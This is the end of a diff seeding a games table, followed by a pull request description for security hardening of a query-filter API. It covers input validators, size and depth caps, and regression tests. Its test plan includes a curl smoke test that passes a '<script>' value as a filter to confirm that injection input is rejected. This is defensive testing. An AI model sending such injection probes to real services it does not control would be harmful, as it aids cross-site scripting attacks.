+  ('epic', 'fallguys', 'Fall Guys', 1, 5000000000, 'downloading', NULL, '{"build_version":"3.7.0"}'),
+  ('epic', 'deadbydaylight', 'Dead by Daylight', 0, 60000000000, 'not_downloaded', NULL, '{"build_version":"8.1.0"}'),
+  ('epic', 'apex', 'Apex Legends', 1, 70000000000, 'up_to_date', '2026-05-18T00:00:00Z', '{"build_version":"v22.1"}'),
+  ('epic', 'rdr2', 'Red Dead Redemption 2', 1, 110000000000, 'up_to_date', '2026-05-07T00:00:00Z', '{"build_version":"1.0.1491.16"}');
+```
+
+30 games (15 steam + 15 epic). Status mix covers all 8 enum values. Sizes span 1.5 GB to 122 GB. `last_prefilled_at` populated for ~half. metadata in JSON form per platform.


### PR DESCRIPTION
## Summary

UAT-4 remediation: 4 SEV-2 + 8 SEV-3 fixes against the BL6/BL7 surface and the load-bearing `_query_helpers.py` shared module. Manual H-1 session empirically confirmed all 3 SEV-2 candidate bugs live before fix.

## Findings remediated

| ID | Sev | Title |
|---|---|---|
| **S2-A** | 2 | `applied_filters` echo emitted all 7 op keys with 6 nulls instead of compact `{op: value}` |
| **S2-B** | 2 | `?sort=,,,` silently dropped default sort |
| **S2-C** | 2 | `_in` cardinality unbounded → DoS amplification |
| **S2-D** | 2 | Oversized int → 500 instead of 400 |
| S3-a | 3 | String filter values had no content validators (XSS-in-echo risk) |
| S3-b | 3 | `build_order_by_clause` missing defensive allow-list re-check |
| S3-c | 3 | `build_where_clause` `KeyError` → 500 on unknown op |
| S3-d | 3 | `RecursionError` on deep JSON metadata uncaught |
| S3-e | 3 | `metadata` size unbounded before json.loads |
| S3-h | 3 | `FilterAllowList` no identifier validation |
| S3-i | 3 | `SortAllowList` no identifier validation |
| S3-j | 3 | Reserved param names could be silent field collisions |

## Deferred (with rationale)

- **S3-f** spec §4.3 index claim — doc-only correction in next spec revision
- **S3-g** COUNT/SELECT race — documented as expected behavior for single-orchestrator deployment
- **All 7 SEV-4** — Phase 3 polish batch

## What this hardens for future paginated F9 endpoints

Every future endpoint (`/jobs`, `/manifests`, `/stats`, `/block_list`) inherits:
- Identifier validation at allow-list construction
- Per-field content validators (extensible via `_VALUE_TYPE_VALIDATORS`)
- Signed 64-bit int range enforcement
- `_in` cardinality cap
- Symmetric defensive re-checks in `build_where_clause` + `build_order_by_clause`
- Plain-dict `applied_filters` echo (compact wire shape)
- Metadata size + depth caps with structured log on rejection

## Verification

- 24 new regression tests in `tests/api/test_uat4_remediation.py`
- Full project suite: **481 tests passing** (was 457; +24)
- `ruff check` / `ruff format --check` / `mypy --strict` / `semgrep p/owasp-top-ten` / `gitleaks` all clean
- UAT-4 checklist 9/9; test-gate counter reset
- Audit doc: `docs/security-audits/uat-4-remediation-security-audit.md`

## Test plan

- [ ] CI status checks pass (8 required)
- [ ] Manual smoke (bearer as `$T`):
  - `curl ... '/api/v1/games?platform=steam' | jq '.meta.applied_filters'` returns `{"platform": {"eq": "steam"}}` (compact)
  - `curl ... '/api/v1/games?sort=,,,'` returns `applied_sort: [{title:asc}, {id:asc}]`
  - `curl ... '/api/v1/games?size_bytes_gte=99999999999999999999999'` returns 400 (not 500)
  - `curl ... '/api/v1/games?last_prefilled_at_gte=<script>'` returns 400 (timestamp validator)

🤖 Generated with [Claude Code](https://claude.com/claude-code)
